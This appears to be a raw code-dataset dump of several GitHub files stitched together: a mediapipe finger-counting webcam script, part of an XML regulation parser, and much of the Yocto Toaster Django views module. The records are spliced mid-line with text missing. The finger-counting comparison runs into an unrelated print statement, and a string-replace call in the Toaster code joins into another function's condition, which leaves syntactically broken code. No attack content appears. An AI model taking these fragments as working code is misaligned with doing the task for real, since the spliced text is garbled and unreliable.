ID","repo_name":"clmcnerney/qbb2018-answers","sub_path":"day2-homework/day2-homework-1.py","file_name":"day2-homework-1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"52345756506","text":"import mediapipe\nimport cv2\nmedhands=mediapipe.solutions.hands\ndraw=mediapipe.solutions.drawing_utils\nhands=medhands.Hands(max_num_hands=1,min_detection_confidence=0.7)\n\ncap=cv2.VideoCapture(0)\nwhile True:\n success,img=cap.read()\n img=cv2.flip(img,1)\n imgrgb=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n res=hands.process(imgrgb)\n \n cv2.rectangle(img,(20,350),(90,440),(0,255,0),cv2.FILLED)\n tipids=[4,8,12,16,20]\n lmlist=[]\n\n if res.multi_hand_landmarks:\n for handlms in res.multi_hand_landmarks:\n for id,lm in enumerate(handlms.landmark):\n cx=lm.x\n cy=lm.y\n lmlist.append([id,cx,cy])\n \n if len(lmlist)!=0 and len(lmlist)==21:\n\n fingerlist=[]\n\n for i in range(0,5):\n\n if lmlist[tipids[i]][2]>>> could not print text')\r\n for item in node:\r\n getXMLData(item)\r\n else:\r\n return 0\r\n \r\n \r\ndef scan(): \r\n tree = etree.parse(xml_45_CFR_Section_11_10)\r\n root = tree.getroot()\r\n getXMLData(root)\r\n #print (g)\r\n \r\ndef main(): \r\n scan()\r\n \r\nif __name__ == \"__main__\": \r\n # calling main function \r\n main() \r\n\r\n\r\n","repo_name":"noblecook/research","sub_path":"PhDProject/edu/ttu/phd/tacm/RegulationTrainingSet.py","file_name":"RegulationTrainingSet.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70103136008","text":"import re\n\nfrom django.db.models import F, Q, Sum\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.http import urlencode\nfrom orm.models import Build, Target, Task, Layer, Layer_Version, Recipe\nfrom orm.models import LogMessage, Variable, Package_Dependency, Package\nfrom orm.models import Task_Dependency, Package_File\nfrom orm.models import Target_Installed_Package, Target_File\nfrom orm.models import TargetKernelFile, TargetSDKFile, Target_Image_File\nfrom orm.models import BitbakeVersion, CustomImageRecipe\n\nfrom django.urls import reverse, resolve\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponseNotFound, JsonResponse\nfrom django.utils import timezone\nfrom datetime import timedelta, datetime\nfrom toastergui.templatetags.projecttags import json as jsonfilter\nfrom decimal import Decimal\nimport json\nimport os\nfrom os.path import dirname\nimport mimetypes\n\nimport logging\n\nfrom toastermain.logs import log_view_mixin\n\nlogger = logging.getLogger(\"toaster\")\n\n# Project creation and managed build enable\nproject_enable = ('1' == os.environ.get('TOASTER_BUILDSERVER'))\nis_project_specific = ('1' == os.environ.get('TOASTER_PROJECTSPECIFIC'))\n\nclass MimeTypeFinder(object):\n # setting this to False enables additional non-standard mimetypes\n # to be included in the guess\n _strict = False\n\n # returns the mimetype for a file path as a string,\n # or 'application/octet-stream' if the type couldn't be guessed\n @classmethod\n def get_mimetype(self, path):\n guess = mimetypes.guess_type(path, self._strict)\n guessed_type = guess[0]\n if guessed_type is None:\n guessed_type = 'application/octet-stream'\n return guessed_type\n\n# single point to add global values into the context before rendering\n@log_view_mixin\ndef toaster_render(request, page, context):\n context['project_enable'] = project_enable\n context['project_specific'] = is_project_specific\n return render(request, page, context)\n\n\n# all new sessions should come through the landing page;\n# determine in which mode we are running in, and redirect appropriately\ndef landing(request):\n # in build mode, we redirect to the command-line builds page\n # if there are any builds for the default (cli builds) project\n default_project = Project.objects.get_or_create_default_project()\n default_project_builds = Build.objects.filter(project = default_project)\n\n # we only redirect to projects page if there is a user-generated project\n num_builds = Build.objects.all().count()\n user_projects = Project.objects.filter(is_default = False)\n has_user_project = user_projects.count() > 0\n\n if num_builds == 0 and has_user_project:\n return redirect(reverse('all-projects'), permanent = False)\n\n if num_builds > 0:\n return redirect(reverse('all-builds'), permanent = False)\n\n context = {'lvs_nos' : Layer_Version.objects.all().count()}\n\n return toaster_render(request, 'landing.html', context)\n\ndef objtojson(obj):\n from django.db.models.query import QuerySet\n from django.db.models import Model\n\n if isinstance(obj, datetime):\n return obj.isoformat()\n elif isinstance(obj, timedelta):\n return obj.total_seconds()\n elif isinstance(obj, QuerySet) or isinstance(obj, set):\n return list(obj)\n elif isinstance(obj, Decimal):\n return str(obj)\n elif type(obj).__name__ == \"RelatedManager\":\n return [x.pk for x in obj.all()]\n elif hasattr( obj, '__dict__') and isinstance(obj, Model):\n d = obj.__dict__\n nd = dict(d)\n for di in d.keys():\n if di.startswith(\"_\"):\n del nd[di]\n elif isinstance(d[di], Model):\n nd[di] = d[di].pk\n elif isinstance(d[di], int) and hasattr(obj, \"get_%s_display\" % di):\n nd[di] = getattr(obj, \"get_%s_display\" % di)()\n return nd\n elif isinstance( obj, type(lambda x:x)):\n import inspect\n return inspect.getsourcelines(obj)[0]\n else:\n raise TypeError(\"Unserializable object %s (%s) of type %s\" % ( obj, dir(obj), type(obj)))\n\n\ndef _lv_to_dict(prj, x = None):\n if x is None:\n def wrapper(x):\n return _lv_to_dict(prj, x)\n return wrapper\n\n return {\"id\": x.pk,\n \"name\": x.layer.name,\n \"tooltip\": \"%s | %s\" % (x.layer.vcs_url,x.get_vcs_reference()),\n \"detail\": \"(%s\" % x.layer.vcs_url + (\")\" if x.release is None else \" | \"+x.get_vcs_reference()+\")\"),\n \"giturl\": x.layer.vcs_url,\n \"layerdetailurl\" : reverse('layerdetails', args=(prj.id,x.pk)),\n \"revision\" : x.get_vcs_reference(),\n }\n\n\ndef _build_page_range(paginator, index = 1):\n try:\n page = paginator.page(index)\n except PageNotAnInteger:\n page = paginator.page(1)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n\n\n page.page_range = [page.number]\n crt_range = 0\n for i in range(1,5):\n if (page.number + i) <= paginator.num_pages:\n page.page_range = page.page_range + [ page.number + i]\n crt_range +=1\n if (page.number - i) > 0:\n page.page_range = [page.number -i] + page.page_range\n crt_range +=1\n if crt_range == 4:\n break\n return page\n\n\ndef _verify_parameters(g, mandatory_parameters):\n miss = []\n for mp in mandatory_parameters:\n if not mp in g:\n miss.append(mp)\n if len(miss):\n return miss\n return None\n\ndef _redirect_parameters(view, g, mandatory_parameters, *args, **kwargs):\n try:\n from urllib import unquote, urlencode\n except ImportError:\n from urllib.parse import unquote, urlencode\n url = reverse(view, kwargs=kwargs)\n params = {}\n for i in g:\n params[i] = g[i]\n for i in mandatory_parameters:\n if not i in params:\n params[i] = unquote(str(mandatory_parameters[i]))\n\n return redirect(url + \"?%s\" % urlencode(params), permanent = False, **kwargs)\n\nclass RedirectException(Exception):\n def __init__(self, view, g, mandatory_parameters, *args, **kwargs):\n super(RedirectException, self).__init__()\n self.view = view\n self.g = g\n self.mandatory_parameters = mandatory_parameters\n self.oargs = args\n self.okwargs = kwargs\n\n def get_redirect_response(self):\n return _redirect_parameters(self.view, self.g, self.mandatory_parameters, self.oargs, **self.okwargs)\n\nFIELD_SEPARATOR = \":\"\nAND_VALUE_SEPARATOR = \"!\"\nOR_VALUE_SEPARATOR = \"|\"\nDESCENDING = \"-\"\n\ndef __get_q_for_val(name, value):\n if \"OR\" in value or \"AND\" in value:\n result = None\n for x in value.split(\"OR\"):\n x = __get_q_for_val(name, x)\n result = result | x if result else x\n return result\n if \"AND\" in value:\n result = None\n for x in value.split(\"AND\"):\n x = __get_q_for_val(name, x)\n result = result & x if result else x\n return result\n if value.startswith(\"NOT\"):\n value = value[3:]\n if value == 'None':\n value = None\n kwargs = { name : value }\n return ~Q(**kwargs)\n else:\n if value == 'None':\n value = None\n kwargs = { name : value }\n return Q(**kwargs)\n\ndef _get_filtering_query(filter_string):\n\n search_terms = filter_string.split(FIELD_SEPARATOR)\n and_keys = search_terms[0].split(AND_VALUE_SEPARATOR)\n and_values = search_terms[1].split(AND_VALUE_SEPARATOR)\n\n and_query = None\n for kv in zip(and_keys, and_values):\n or_keys = kv[0].split(OR_VALUE_SEPARATOR)\n or_values = kv[1].split(OR_VALUE_SEPARATOR)\n query = None\n for key, val in zip(or_keys, or_values):\n x = __get_q_for_val(key, val)\n query = query | x if query else x\n\n and_query = and_query & query if and_query else query\n\n return and_query\n\ndef _get_toggle_order(request, orderkey, toggle_reverse = False):\n if toggle_reverse:\n return \"%s:+\" % orderkey if request.GET.get('orderby', \"\") == \"%s:-\" % orderkey else \"%s:-\" % orderkey\n else:\n return \"%s:-\" % orderkey if request.GET.get('orderby', \"\") == \"%s:+\" % orderkey else \"%s:+\" % orderkey\n\ndef _get_toggle_order_icon(request, orderkey):\n if request.GET.get('orderby', \"\") == \"%s:+\"%orderkey:\n return \"down\"\n elif request.GET.get('orderby', \"\") == \"%s:-\"%orderkey:\n return \"up\"\n else:\n return None\n\n# we check that the input comes in a valid form that we can recognize\ndef _validate_input(field_input, model):\n\n invalid = None\n\n if field_input:\n field_input_list = field_input.split(FIELD_SEPARATOR)\n\n # Check we have only one colon\n if len(field_input_list) != 2:\n invalid = \"We have an invalid number of separators: \" + field_input + \" -> \" + str(field_input_list)\n return None, invalid\n\n # Check we have an equal number of terms both sides of the colon\n if len(field_input_list[0].split(AND_VALUE_SEPARATOR)) != len(field_input_list[1].split(AND_VALUE_SEPARATOR)):\n invalid = \"Not all arg names got values\"\n return None, invalid + str(field_input_list)\n\n # Check we are looking for a valid field\n valid_fields = [f.name for f in model._meta.get_fields()]\n for field in field_input_list[0].split(AND_VALUE_SEPARATOR):\n if True in [field.startswith(x) for x in valid_fields]:\n break\n else:\n return None, (field, valid_fields)\n\n return field_input, invalid\n\n# uses search_allowed_fields in orm/models.py to create a search query\n# for these fields with the supplied input text\ndef _get_search_results(search_term, queryset, model):\n search_object = None\n for st in search_term.split(\" \"):\n queries = None\n for field in model.search_allowed_fields:\n query = Q(**{field + '__icontains': st})\n queries = queries | query if queries else query\n\n search_object = search_object & queries if search_object else queries\n queryset = queryset.filter(search_object)\n\n return queryset\n\n\n# function to extract the search/filter/ordering parameters from the request\n# it uses the request and the model to validate input for the filter and orderby values\ndef _search_tuple(request, model):\n ordering_string, invalid = _validate_input(request.GET.get('orderby', ''), model)\n if invalid:\n raise BaseException(\"Invalid ordering model:\" + str(model) + str(invalid))\n\n filter_string, invalid = _validate_input(request.GET.get('filter', ''), model)\n if invalid:\n raise BaseException(\"Invalid filter \" + str(invalid))\n\n search_term = request.GET.get('search', '')\n return (filter_string, search_term, ordering_string)\n\n\n# returns a lazy-evaluated queryset for a filter/search/order combination\ndef _get_queryset(model, queryset, filter_string, search_term, ordering_string, ordering_secondary=''):\n if filter_string:\n filter_query = _get_filtering_query(filter_string)\n queryset = queryset.filter(filter_query)\n else:\n queryset = queryset.all()\n\n if search_term:\n queryset = _get_search_results(search_term, queryset, model)\n\n if ordering_string:\n column, order = ordering_string.split(':')\n if column == re.sub('-','',ordering_secondary):\n ordering_secondary=''\n if order.lower() == DESCENDING:\n column = '-' + column\n if ordering_secondary:\n queryset = queryset.order_by(column, ordering_secondary)\n else:\n queryset = queryset.order_by(column)\n\n # insure only distinct records (e.g. from multiple search hits) are returned\n return queryset.distinct()\n\n# returns the value of entries per page and the name of the applied sorting field.\n# if the value is given explicitly as a GET parameter it will be the first selected,\n# otherwise the cookie value will be used.\ndef _get_parameters_values(request, default_count, default_order):\n current_url = resolve(request.path_info).url_name\n pagesize = request.GET.get('count', request.session.get('%s_count' % current_url, default_count))\n orderby = request.GET.get('orderby', request.session.get('%s_orderby' % current_url, default_order))\n return (pagesize, orderby)\n\n\n# set cookies for parameters. this is usefull in case parameters are set\n# manually from the GET values of the link\ndef _set_parameters_values(pagesize, orderby, request):\n from django.urls import resolve\n current_url = resolve(request.path_info).url_name\n request.session['%s_count' % current_url] = pagesize\n request.session['%s_orderby' % current_url] =orderby\n\n# date range: normalize GUI's dd/mm/yyyy to date object\ndef _normalize_input_date(date_str,default):\n date_str=re.sub('/', '-', date_str)\n # accept dd/mm/yyyy to d/m/yy\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%Y\")\n except ValueError:\n # courtesy try with two digit year\n try:\n date_in = datetime.strptime(date_str, \"%d-%m-%y\")\n except ValueError:\n return default\n date_in = date_in.replace(tzinfo=default.tzinfo)\n return date_in\n\n# convert and normalize any received date range filter, for example:\n# \"completed_on__gte!completed_on__lt:01/03/2015!02/03/2015_daterange\" to\n# \"completed_on__gte!completed_on__lt:2015-03-01!2015-03-02\"\ndef _modify_date_range_filter(filter_string):\n # was the date range radio button selected?\n if 0 > filter_string.find('_daterange'):\n return filter_string,''\n # normalize GUI dates to database format\n filter_string = filter_string.replace('_daterange','').replace(':','!');\n filter_list = filter_string.split('!');\n if 4 != len(filter_list):\n return filter_string\n today = timezone.localtime(timezone.now())\n date_id = filter_list[1]\n date_from = _normalize_input_date(filter_list[2],today)\n date_to = _normalize_input_date(filter_list[3],today)\n # swap dates if manually set dates are out of order\n if date_to < date_from:\n date_to,date_from = date_from,date_to\n # convert to strings, make 'date_to' inclusive by moving to begining of next day\n date_from_str = date_from.strftime(\"%Y-%m-%d\")\n date_to_str = (date_to+timedelta(days=1)).strftime(\"%Y-%m-%d\")\n filter_string=filter_list[0]+'!'+filter_list[1]+':'+date_from_str+'!'+date_to_str\n daterange_selected = re.sub('__.*','', date_id)\n return filter_string,daterange_selected\n\ndef _add_daterange_context(queryset_all, request, daterange_list):\n # calculate the exact begining of local today and yesterday\n today_begin = timezone.localtime(timezone.now())\n yesterday_begin = today_begin - timedelta(days=1)\n # add daterange persistent\n context_date = {}\n context_date['last_date_from'] = request.GET.get('last_date_from',timezone.localtime(timezone.now()).strftime(\"%d/%m/%Y\"))\n context_date['last_date_to' ] = request.GET.get('last_date_to' ,context_date['last_date_from'])\n # calculate the date ranges, avoid second sort for 'created'\n # fetch the respective max range from the database\n context_date['daterange_filter']=''\n for key in daterange_list:\n queryset_key = queryset_all.order_by(key)\n try:\n context_date['dateMin_'+key]=timezone.localtime(getattr(queryset_key.first(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMin_'+key]=timezone.localtime(timezone.now())\n try:\n context_date['dateMax_'+key]=timezone.localtime(getattr(queryset_key.last(),key)).strftime(\"%d/%m/%Y\")\n except AttributeError:\n context_date['dateMax_'+key]=timezone.localtime(timezone.now())\n return context_date,today_begin,yesterday_begin\n\n\n##\n# build dashboard for a single build, coming in as argument\n# Each build may contain multiple targets and each target\n# may generate multiple image files. display them all.\n#\ndef builddashboard( request, build_id ):\n template = \"builddashboard.html\"\n if Build.objects.filter( pk=build_id ).count( ) == 0 :\n return redirect( builds )\n build = Build.objects.get( pk = build_id );\n layerVersionId = Layer_Version.objects.filter( build = build_id );\n recipeCount = Recipe.objects.filter( layer_version__id__in = layerVersionId ).count( );\n tgts = Target.objects.filter( build_id = build_id ).order_by( 'target' );\n\n # set up custom target list with computed package and image data\n targets = []\n ntargets = 0\n\n # True if at least one target for this build has an SDK artifact\n # or image file\n has_artifacts = False\n\n for t in tgts:\n elem = {}\n elem['target'] = t\n\n target_has_images = False\n image_files = []\n\n npkg = 0\n pkgsz = 0\n package = None\n # Chunk the query to avoid \"too many SQL variables\" error\n package_set = t.target_installed_package_set.all()\n package_set_len = len(package_set)\n for ps_start in range(0,package_set_len,500):\n ps_stop = min(ps_start+500,package_set_len)\n for package in Package.objects.filter(id__in = [x.package_id for x in package_set[ps_start:ps_stop]]):\n pkgsz = pkgsz + package.size\n if package.installed_name:\n npkg = npkg + 1\n elem['npkg'] = npkg\n elem['pkgsz'] = pkgsz\n ti = Target_Image_File.objects.filter(target_id = t.id)\n for i in ti:\n ndx = i.file_name.rfind('/')\n if ndx < 0:\n ndx = 0;\n f = i.file_name[ndx + 1:]\n image_files.append({\n 'id': i.id,\n 'path': f,\n 'size': i.file_size,\n 'suffix': i.suffix\n })\n if len(image_files) > 0:\n target_has_images = True\n elem['targetHasImages'] = target_has_images\n\n elem['imageFiles'] = image_files\n elem['target_kernel_artifacts'] = t.targetkernelfile_set.all()\n\n target_sdk_files = t.targetsdkfile_set.all()\n target_sdk_artifacts_count = target_sdk_files.count()\n elem['target_sdk_artifacts_count'] = target_sdk_artifacts_count\n elem['target_sdk_artifacts'] = target_sdk_files\n\n if target_has_images or target_sdk_artifacts_count > 0:\n has_artifacts = True\n\n targets.append(elem)\n\n ##\n # how many packages in this build - ignore anonymous ones\n #\n\n packageCount = 0\n packages = Package.objects.filter( build_id = build_id )\n for p in packages:\n if ( p.installed_name ):\n packageCount = packageCount + 1\n\n logmessages = list(LogMessage.objects.filter( build = build_id ))\n\n context = {\n 'build' : build,\n 'project' : build.project,\n 'hasArtifacts' : has_artifacts,\n 'ntargets' : ntargets,\n 'targets' : targets,\n 'recipecount' : recipeCount,\n 'packagecount' : packageCount,\n 'logmessages' : logmessages,\n }\n return toaster_render( request, template, context )\n\n\n\ndef generateCoveredList2( revlist = None ):\n if not revlist:\n revlist = []\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n while len(covered_list):\n revlist = [ x for x in revlist if x.outcome != Task.OUTCOME_COVERED ]\n if len(revlist) > 0:\n return revlist\n\n newlist = _find_task_revdep_list(covered_list)\n\n revlist = list(set(revlist + newlist))\n covered_list = [ x for x in revlist if x.outcome == Task.OUTCOME_COVERED ]\n return revlist\n\ndef task( request, build_id, task_id ):\n template = \"task.html\"\n tasks_list = Task.objects.filter( pk=task_id )\n if tasks_list.count( ) == 0:\n return redirect( builds )\n task_object = tasks_list[ 0 ];\n dependencies = sorted(\n _find_task_dep( task_object ),\n key=lambda t:'%s_%s %s'%(t.recipe.name, t.recipe.version, t.task_name))\n reverse_dependencies = sorted(\n _find_task_revdep( task_object ),\n key=lambda t:'%s_%s %s'%( t.recipe.name, t.recipe.version, t.task_name ))\n coveredBy = '';\n if ( task_object.outcome == Task.OUTCOME_COVERED ):\n# _list = generateCoveredList( task )\n coveredBy = sorted(generateCoveredList2( _find_task_revdep( task_object ) ), key = lambda x: x.recipe.name)\n log_head = ''\n log_body = ''\n if task_object.outcome == task_object.OUTCOME_FAILED:\n pass\n\n uri_list= [ ]\n variables = Variable.objects.filter(build=build_id)\n v=variables.filter(variable_name='SSTATE_DIR')\n if v.count() > 0:\n uri_list.append(v[0].variable_value)\n v=variables.filter(variable_name='SSTATE_MIRRORS')\n if (v.count() > 0):\n for mirror in v[0].variable_value.split('\\\\n'):\n s=re.sub('.* ','',mirror.strip(' \\t\\n\\r'))\n if len(s):\n uri_list.append(s)\n\n context = {\n 'build' : Build.objects.filter( pk = build_id )[ 0 ],\n 'object' : task_object,\n 'task' : task_object,\n 'covered_by' : coveredBy,\n 'deps' : dependencies,\n 'rdeps' : reverse_dependencies,\n 'log_head' : log_head,\n 'log_body' : log_body,\n 'showing_matches' : False,\n 'uri_list' : uri_list,\n 'task_in_tasks_table_pg': int(task_object.order / 25) + 1\n }\n if request.GET.get( 'show_matches', \"\" ):\n context[ 'showing_matches' ] = True\n context[ 'matching_tasks' ] = Task.objects.filter(\n sstate_checksum=task_object.sstate_checksum ).filter(\n build__completed_on__lt=task_object.build.completed_on).exclude(\n order__isnull=True).exclude(outcome=Task.OUTCOME_NA).order_by('-build__completed_on')\n\n return toaster_render( request, template, context )\n\ndef recipe(request, build_id, recipe_id, active_tab=\"1\"):\n template = \"recipe.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n layer_version = Layer_Version.objects.get(pk=recipe_object.layer_version_id)\n layer = Layer.objects.get(pk=layer_version.layer_id)\n tasks_list = Task.objects.filter(recipe_id = recipe_id, build_id = build_id).exclude(order__isnull=True).exclude(task_name__endswith='_setscene').exclude(outcome=Task.OUTCOME_NA)\n package_count = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0).count()\n\n if active_tab != '1' and active_tab != '3' and active_tab != '4' :\n active_tab = '1'\n tab_states = {'1': '', '3': '', '4': ''}\n tab_states[active_tab] = 'active'\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'object' : recipe_object,\n 'layer_version' : layer_version,\n 'layer' : layer,\n 'tasks' : tasks_list,\n 'package_count' : package_count,\n 'tab_states' : tab_states,\n }\n return toaster_render(request, template, context)\n\ndef recipe_packages(request, build_id, recipe_id):\n template = \"recipe_packages.html\"\n if Recipe.objects.filter(pk=recipe_id).count() == 0 :\n return redirect(builds)\n\n (pagesize, orderby) = _get_parameters_values(request, 10, 'name:+')\n mandatory_parameters = { 'count': pagesize, 'page' : 1, 'orderby': orderby }\n retval = _verify_parameters( request.GET, mandatory_parameters )\n if retval:\n return _redirect_parameters( 'recipe_packages', request.GET, mandatory_parameters, build_id = build_id, recipe_id = recipe_id)\n (filter_string, search_term, ordering_string) = _search_tuple(request, Package)\n\n recipe_object = Recipe.objects.get(pk=recipe_id)\n queryset = Package.objects.filter(recipe_id = recipe_id).filter(build_id = build_id).filter(size__gte=0)\n package_count = queryset.count()\n queryset = _get_queryset(Package, queryset, filter_string, search_term, ordering_string, 'name')\n\n packages = _build_page_range(Paginator(queryset, pagesize),request.GET.get('page', 1))\n\n context = {\n 'build' : Build.objects.get(pk=build_id),\n 'recipe' : recipe_object,\n 'objects' : packages,\n 'object_count' : package_count,\n 'tablecols':[\n {\n 'name':'Package',\n 'orderfield': _get_toggle_order(request,\"name\"),\n 'ordericon': _get_toggle_order_icon(request,\"name\"),\n 'orderkey': \"name\",\n },\n {\n 'name':'Version',\n },\n {\n 'name':'Size',\n 'orderfield': _get_toggle_order(request,\"size\", True),\n 'ordericon': _get_toggle_order_icon(request,\"size\"),\n 'orderkey': 'size',\n 'dclass': 'sizecol span2',\n },\n ]\n }\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\nfrom django.http import HttpResponse\n@log_view_mixin\ndef xhr_dirinfo(request, build_id, target_id):\n top = request.GET.get('start', '/')\n return HttpResponse(_get_dir_entries(build_id, target_id, top), content_type = \"application/json\")\n\nfrom django.utils.functional import Promise\nfrom django.utils.encoding import force_str\nclass LazyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Promise):\n return force_str(obj)\n return super(LazyEncoder, self).default(obj)\n\nfrom toastergui.templatetags.projecttags import filtered_filesizeformat\nimport os\ndef _get_dir_entries(build_id, target_id, start):\n node_str = {\n Target_File.ITYPE_REGULAR : '-',\n Target_File.ITYPE_DIRECTORY : 'd',\n Target_File.ITYPE_SYMLINK : 'l',\n Target_File.ITYPE_SOCKET : 's',\n Target_File.ITYPE_FIFO : 'p',\n Target_File.ITYPE_CHARACTER : 'c',\n Target_File.ITYPE_BLOCK : 'b',\n }\n response = []\n objects = Target_File.objects.filter(target__exact=target_id, directory__path=start)\n target_packages = Target_Installed_Package.objects.filter(target__exact=target_id).values_list('package_id', flat=True)\n for o in objects:\n # exclude root inode '/'\n if o.path == '/':\n continue\n try:\n entry = {}\n entry['parent'] = start\n entry['name'] = os.path.basename(o.path)\n entry['fullpath'] = o.path\n\n # set defaults, not all dentries have packages\n entry['installed_package'] = None\n entry['package_id'] = None\n entry['package'] = None\n entry['link_to'] = None\n if o.inodetype == Target_File.ITYPE_DIRECTORY:\n entry['isdir'] = 1\n # is there content in directory\n entry['childcount'] = Target_File.objects.filter(target__exact=target_id, directory__path=o.path).all().count()\n else:\n entry['isdir'] = 0\n\n # resolve the file to get the package from the resolved file\n resolved_id = o.sym_target_id\n resolved_path = o.path\n if target_packages.count():\n while resolved_id != \"\" and resolved_id is not None:\n tf = Target_File.objects.get(pk=resolved_id)\n resolved_path = tf.path\n resolved_id = tf.sym_target_id\n\n thisfile=Package_File.objects.all().filter(path__exact=resolved_path, package_id__in=target_packages)\n if thisfile.count():\n p = Package.objects.get(pk=thisfile[0].package_id)\n entry['installed_package'] = p.installed_name\n entry['package_id'] = str(p.id)\n entry['package'] = p.name\n # don't use resolved path from above, show immediate link-to\n if o.sym_target_id != \"\" and o.sym_target_id is not None:\n entry['link_to'] = Target_File.objects.get(pk=o.sym_target_id).path\n entry['size'] = filtered_filesizeformat(o.size)\n if entry['link_to'] is not None:\n entry['permission'] = node_str[o.inodetype] + o.permission\n else:\n entry['permission'] = node_str[o.inodetype] + o.permission\n entry['owner'] = o.owner\n entry['group'] = o.group\n response.append(entry)\n\n except Exception as e:\n print(\"Exception \", e)\n traceback.print_exc()\n\n # sort by directories first, then by name\n rsorted = sorted(response, key=lambda entry : entry['name'])\n rsorted = sorted(rsorted, key=lambda entry : entry['isdir'], reverse=True)\n return json.dumps(rsorted, cls=LazyEncoder).replace(' 0:\n file_filter += 'conf/(local|bblayers).conf'\n if filter_string.find('conf/machine/') > 0:\n file_filter += 'conf/machine/'\n if filter_string.find('conf/distro/') > 0:\n file_filter += 'conf/distro/'\n if filter_string.find('/bitbake.conf') > 0:\n file_filter += '/bitbake.conf'\n build_dir=re.sub(\"/tmp/log/.*\",\"\",Build.objects.get(pk=build_id).cooker_log_path)\n\n build = Build.objects.get(pk=build_id)\n\n context = {\n 'objectname': 'configvars',\n 'object_search_display':'BitBake variables',\n 'filter_search_display':'variables',\n 'file_filter': file_filter,\n 'build': build,\n 'project': build.project,\n 'objects' : variables,\n 'total_count':queryset_with_search.count(),\n 'default_orderby' : 'variable_name:+',\n 'search_term':search_term,\n # Specifies the display of columns for the table, appearance in \"Edit columns\" box, toggling default show/hide, and specifying filters for columns\n 'tablecols' : [\n {'name': 'Variable',\n 'qhelp': \"BitBake is a generic task executor that considers a list of tasks with dependencies and handles metadata that consists of variables in a certain format that get passed to the tasks\",\n 'orderfield': _get_toggle_order(request, \"variable_name\"),\n 'ordericon':_get_toggle_order_icon(request, \"variable_name\"),\n },\n {'name': 'Value',\n 'qhelp': \"The value assigned to the variable\",\n },\n {'name': 'Set in file',\n 'qhelp': \"The last configuration file that touched the variable value\",\n 'clclass': 'file', 'hidden' : 0,\n 'orderkey' : 'vhistory__file_name',\n 'filter' : {\n 'class' : 'vhistory__file_name',\n 'label': 'Show:',\n 'options' : [\n ('Local configuration variables', 'vhistory__file_name__contains:'+build_dir+'/conf/',queryset_with_search.filter(vhistory__file_name__contains=build_dir+'/conf/').count(), 'Select this filter to see variables set by the local.conf and bblayers.conf configuration files inside the /build/conf/ directory'),\n ('Machine configuration variables', 'vhistory__file_name__contains:conf/machine/',queryset_with_search.filter(vhistory__file_name__contains='conf/machine').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/machine/ directory'),\n ('Distro configuration variables', 'vhistory__file_name__contains:conf/distro/',queryset_with_search.filter(vhistory__file_name__contains='conf/distro').count(), 'Select this filter to see variables set by the configuration file(s) inside your layers /conf/distro/ directory'),\n ('Layer configuration variables', 'vhistory__file_name__contains:conf/layer.conf',queryset_with_search.filter(vhistory__file_name__contains='conf/layer.conf').count(), 'Select this filter to see variables set by the layer.conf configuration file inside your layers'),\n ('bitbake.conf variables', 'vhistory__file_name__contains:/bitbake.conf',queryset_with_search.filter(vhistory__file_name__contains='/bitbake.conf').count(), 'Select this filter to see variables set by the bitbake.conf configuration file'),\n ]\n },\n },\n {'name': 'Description',\n 'qhelp': \"A brief explanation of the variable\",\n 'clclass': 'description', 'hidden' : 0,\n 'dclass': \"span4\",\n 'filter' : {\n 'class' : 'description',\n 'label': 'Show:',\n 'options' : [\n ('Variables with description', 'description__regex:.+', queryset_with_search.filter(description__regex='.+').count(), 'We provide descriptions for the most common BitBake variables. The list of descriptions lives in meta/conf/documentation.conf'),\n ]\n },\n },\n ],\n }\n\n response = toaster_render(request, template, context)\n _set_parameters_values(pagesize, orderby, request)\n return response\n\ndef bfile(request, build_id, package_id):\n template = 'bfile.html'\n files = Package_File.objects.filter(package = package_id)\n build = Build.objects.get(pk=build_id)\n context = {\n 'build': build,\n 'project': build.project,\n 'objects' : files\n }\n return toaster_render(request, template, context)\n\n\n# A set of dependency types valid for both included and built package views\nOTHER_DEPENDS_BASE = [\n Package_Dependency.TYPE_RSUGGESTS,\n Package_Dependency.TYPE_RPROVIDES,\n Package_Dependency.TYPE_RREPLACES,\n Package_Dependency.TYPE_RCONFLICTS,\n ]\n\n# value for invalid row id\nINVALID_KEY = -1\n\n\"\"\"\nGiven a package id, target_id retrieves two sets of this image and package's\ndependencies. The return value is a dictionary consisting of two other\nlists: a list of 'runtime' dependencies, that is, having RDEPENDS\nvalues in source package's recipe, and a list of other dependencies, that is\nthe list of possible recipe variables as found in OTHER_DEPENDS_BASE plus\nthe RRECOMMENDS or TRECOMMENDS value.\nThe lists are built in the sort order specified for the package runtime\ndependency views.\n\"\"\"\ndef _get_package_dependencies(package_id, target_id = INVALID_KEY):\n runtime_deps = []\n other_deps = []\n other_depends_types = OTHER_DEPENDS_BASE\n\n if target_id != INVALID_KEY :\n rdepends_type = Package_Dependency.TYPE_TRDEPENDS\n other_depends_types += [Package_Dependency.TYPE_TRECOMMENDS]\n else :\n rdepends_type = Package_Dependency.TYPE_RDEPENDS\n other_depends_types += [Package_Dependency.TYPE_RRECOMMENDS]\n\n package = Package.objects.get(pk=package_id)\n if target_id != INVALID_KEY :\n alldeps = package.package_dependencies_source.filter(target_id__exact = target_id)\n else :\n alldeps = package.package_dependencies_source.all()\n for idep in alldeps:\n dep_package = Package.objects.get(pk=idep.depends_on_id)\n dep_entry = Package_Dependency.DEPENDS_DICT[idep.dep_type]\n if dep_package.version == '' :\n version = ''\n else :\n version = dep_package.version + \"-\" + dep_package.revision\n installed = False\n if target_id != 